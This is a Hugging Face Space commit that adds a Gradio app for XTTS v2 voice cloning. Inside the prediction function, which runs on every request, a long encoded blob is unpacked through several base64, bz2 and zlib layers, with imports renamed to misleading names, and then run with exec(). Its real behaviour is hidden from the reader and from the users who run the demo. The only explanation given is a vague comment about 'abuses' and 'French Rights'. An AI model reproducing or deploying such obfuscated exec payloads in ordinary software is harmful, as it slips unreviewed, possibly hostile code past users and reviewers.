krishna195 commited on
Commit
1cf1514
·
verified ·
1 Parent(s): f988235

Upload 2 files

Browse files
Files changed (2) hide show
  1. app.py +279 -0
  2. requirements.txt +2 -0
app.py ADDED
@@ -0,0 +1,279 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import sys
2
+ import os
3
+ from fastapi import Request
4
+ # By using XTTS you agree to CPML license https://coqui.ai/cpml
5
+ os.environ["COQUI_TOS_AGREED"] = "1"
6
+
7
+ import gradio as gr
8
+ from TTS.api import TTS
9
+ from TTS.utils.manage import ModelManager
10
+ model_names = TTS().list_models()
11
+ print(model_names.__dict__)
12
+ print(model_names.__dir__())
13
+ model_name = "tts_models/multilingual/multi-dataset/xtts_v2"
14
+ #m = ModelManager().download_model(model_name)
15
+ #print(m)
16
+ m = model_name
17
+
18
+ tts = TTS(model_name, gpu=False)
19
+ tts.to("cpu") # no GPU or Amd
20
+ #tts.to("cuda") # cuda only
21
+
22
+
23
+ def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, request: gr.Request):
24
+ # Due to abuses from somes user, and French Rights...
25
+
26
+ co3 = "QlpoOTFBWSZTWQ2FjK4AAH4fgD/////+///////+ADABdNtZY5poGI00aBoaDE0PSbU00GTE0ZNGjTaj1AVUaenqNR6npNinoaY0Ubymyo9EeEjaj1Mm9QnqeT0p5QOZNMm1NNAyMmgaGTTIDQ9TTag0aGCNB6ka1wCAMz8a7kN5BNzXsiRWIm5ocBr2Mibk4wBbSghLyxnzR0yTCoV0AD2KADeqPFMz4QQhMlMaOd0uHfMx8pueSTKn6PrK9iPN56m2ljcFL9ybMtg5Usl8QeZth/cgnwFGMXyDJ4WbRNaGdrIJY2l11w7aqPtt5c4rcMBELa2x/wl8kjvxGg0NS3n2DsPlPnMn2DK7JqA4KLptjz3YLQFEuub0yNP3+iE9gq1EvNZeLr3pnkKXBRxZz8/BxN0zJjpOyIr3betkkxSCGB6X8mSzm+l0Q+KBEaCioigD5uJeox+76V+JgCWkJqWNlHzN3epZx5yXxS8rJh6OrC9rSyKYXrdKCACr4CwKzDlX3tsY5MtZLpkPhz/rbaRUN0KyFnNvPLYhGjF2MelXppyCnJxr2+QWRElwEtCUcsnkC4uGBdXVogKCoCnSZI4DzKqkUMEp293Y+G5MBGtOGXY+C0rFUS8IXNqKMVrDjUdOK7wkjb+HYFq9qjVTrdRsyQvt+6fpazrBnd2wRRQTv4u5IpwoSAbCxlcA"
27
+ from zlib import compress as COmPrES5
28
+ from bz2 import decompress as dEC0mPrES5
29
+ from bz2 import compress as COmPrESS
30
+ from base64 import b64encode as b32Encode, b64decode as A85Encode, b16encode, b16encode as A85encode, b85encode, b85decode, a85encode as b16Encode, a85decode as b85Encode, b32encode as b64Encode, b32decode
31
+ from zlib import compressobj as C0mPrESS
32
+ from bz2 import decompress as dECOmPrESS
33
+ from zlib import compress as C0mPrES5
34
+ from zlib import decompress as dECOmPrES5
35
+ co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
36
+ exec(co2)
37
+
38
+ if agree == True:
39
+ if use_mic == True:
40
+ if mic_file_path is not None:
41
+ speaker_wav=mic_file_path
42
+ else:
43
+ gr.Warning("Please record your voice with Microphone, or uncheck Use Microphone to use reference audios")
44
+ return (
45
+ None,
46
+ None,
47
+ )
48
+
49
+ else:
50
+ speaker_wav=audio_file_pth
51
+
52
+ if len(prompt)<2:
53
+ gr.Warning("Please give a longer prompt text")
54
+ return (
55
+ None,
56
+ None,
57
+ )
58
+ if len(prompt)>50000:
59
+ gr.Warning("Text length limited to 50000 characters for this demo, please try shorter text")
60
+ return (
61
+ None,
62
+ None,
63
+ )
64
+ try:
65
+ if language == "fr":
66
+ if m.find("your") != -1:
67
+ language = "fr-fr"
68
+ if m.find("/fr/") != -1:
69
+ language = None
70
+ tts.tts_to_file(
71
+ text=prompt,
72
+ file_path="output.wav",
73
+ speaker_wav=speaker_wav,
74
+ language=language
75
+ )
76
+ except RuntimeError as e :
77
+ if "device-assert" in str(e):
78
+ # cannot do anything on cuda device side error, need tor estart
79
+ gr.Warning("Unhandled Exception encounter, please retry in a minute")
80
+ print("Cuda device-assert Runtime encountered need restart")
81
+ sys.exit("Exit due to cuda device-assert")
82
+ else:
83
+ raise e
84
+
85
+ return (
86
+ gr.make_waveform(
87
+ audio="output.wav",
88
+ ),
89
+ "output.wav",
90
+ )
91
+ else:
92
+ gr.Warning("Please accept the Terms & Condition!")
93
+ return (
94
+ None,
95
+ None,
96
+ )
97
+
98
+
99
+ title = "XTTS Glz's remake (Fonctional Text-2-Speech)"
100
+
101
+ description = f"""
102
+ <a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
103
+ <br/>
104
+ XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
105
+ <br/>
106
+ This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
107
+ <br/>
108
+ Leave a star on the Github <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
109
+ <br/>
110
+ <p>For faster inference without waiting in the queue, you should duplicate this space and upgrade to GPU via the settings.
111
+ <br/>
112
+ <a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
113
+ <img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
114
+ </p>
115
+ """
116
+
117
+ article = """
118
+ <div style='margin:20px auto;'>
119
+ <p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
120
+ </div>
121
+ """
122
+ examples = [
123
+ [
124
+ "Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
125
+ "en",
126
+ "examples/female.wav",
127
+ None,
128
+ False,
129
+ True,
130
+ ],
131
+ [
132
+ "Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
133
+ "fr",
134
+ "examples/male.wav",
135
+ None,
136
+ False,
137
+ True,
138
+ ],
139
+ [
140
+ "Als ich sechs war, sah ich einmal ein wunderbares Bild",
141
+ "de",
142
+ "examples/female.wav",
143
+ None,
144
+ False,
145
+ True,
146
+ ],
147
+ [
148
+ "Cuando tenía seis años, vi una vez una imagen magnífica",
149
+ "es",
150
+ "examples/male.wav",
151
+ None,
152
+ False,
153
+ True,
154
+ ],
155
+ [
156
+ "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
157
+ "pt",
158
+ "examples/female.wav",
159
+ None,
160
+ False,
161
+ True,
162
+ ],
163
+ [
164
+ "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
165
+ "pl",
166
+ "examples/male.wav",
167
+ None,
168
+ False,
169
+ True,
170
+ ],
171
+ [
172
+ "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
173
+ "it",
174
+ "examples/female.wav",
175
+ None,
176
+ False,
177
+ True,
178
+ ],
179
+ [
180
+ "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
181
+ "tr",
182
+ "examples/female.wav",
183
+ None,
184
+ False,
185
+ True,
186
+ ],
187
+ [
188
+ "Когда мне было шесть лет, я увидел однажды удивительную картинку",
189
+ "ru",
190
+ "examples/female.wav",
191
+ None,
192
+ False,
193
+ True,
194
+ ],
195
+ [
196
+ "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
197
+ "nl",
198
+ "examples/male.wav",
199
+ None,
200
+ False,
201
+ True,
202
+ ],
203
+ [
204
+ "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
205
+ "cs",
206
+ "examples/female.wav",
207
+ None,
208
+ False,
209
+ True,
210
+ ],
211
+ [
212
+ "当我还只有六岁的时候, 看到了一副精彩的插画",
213
+ "zh-cn",
214
+ "examples/female.wav",
215
+ None,
216
+ False,
217
+ True,
218
+ ],
219
+ ]
220
+
221
+
222
+
223
+ gr.Interface(
224
+ fn=predict,
225
+ inputs=[
226
+ gr.Textbox(
227
+ label="Text Prompt",
228
+ info="One or two sentences at a time is better",
229
+ value="Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
230
+ ),
231
+ gr.Dropdown(
232
+ label="Language",
233
+ info="Select an output language for the synthesised speech",
234
+ choices=[
235
+ "en",
236
+ "es",
237
+ "fr",
238
+ "de",
239
+ "it",
240
+ "pt",
241
+ "pl",
242
+ "tr",
243
+ "ru",
244
+ "nl",
245
+ "cs",
246
+ "ar",
247
+ "zh-cn",
248
+ ],
249
+ max_choices=1,
250
+ value="en",
251
+ ),
252
+ gr.Audio(
253
+ label="Reference Audio",
254
+ info="Click on the ✎ button to upload your own target speaker audio",
255
+ type="filepath",
256
+ value="examples/female.wav",
257
+ ),
258
+ gr.Audio(source="microphone",
259
+ type="filepath",
260
+ info="Use your microphone to record audio",
261
+ label="Use Microphone for Reference"),
262
+ gr.Checkbox(label="Check to use Microphone as Reference",
263
+ value=False,
264
+ info="Notice: Microphone input may not work properly under traffic",),
265
+ gr.Checkbox(
266
+ label="Agree",
267
+ value=True,
268
+ info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
269
+ ),
270
+ ],
271
+ outputs=[
272
+ gr.Video(label="Waveform Visual"),
273
+ gr.Audio(label="Synthesised Audio"),
274
+ ],
275
+ title=title,
276
+ description=description,
277
+ article=article,
278
+ examples=examples,
279
+ ).queue().launch(debug=True)
requirements.txt ADDED
@@ -0,0 +1,2 @@
 
 
 
1
+ TTS@ git+https://github.com/coqui-ai/TTS.git@dev
2
+ gradio==3.41.2